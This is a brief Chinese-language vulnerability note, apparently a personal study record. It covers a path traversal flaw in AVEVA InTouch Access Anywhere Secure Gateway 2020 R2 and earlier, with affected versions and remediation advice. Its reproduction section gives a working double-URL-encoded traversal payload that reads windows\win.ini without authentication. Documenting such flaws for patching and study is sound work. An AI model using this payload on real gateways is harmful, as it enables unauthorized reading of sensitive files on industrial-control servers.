漏洞描述:
AVEVA InTouch Access Anywhere Secure Gateway 2020 R2及以前的版本存在路径遍历漏洞,未授权的攻击者可利用该漏洞获取服务器敏感信息。
漏洞利用条件:
服务器没有进行控制文件的访问和过滤../导致任意文件读取
漏洞影响范围:
Gateway<2020 R2
漏洞复现:
1.漏洞页面:
2.poc:/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
修复建议:
- 关注厂商修复漏洞
- 在服务器本地⽂件及远程⽂件,进⾏严格的检查,参数中不允许出现../之类的⽬录跳转
- web服务器上通过授权管理机制来控制⽂件和资源的访问。
学习记录过程,仅供参考!!!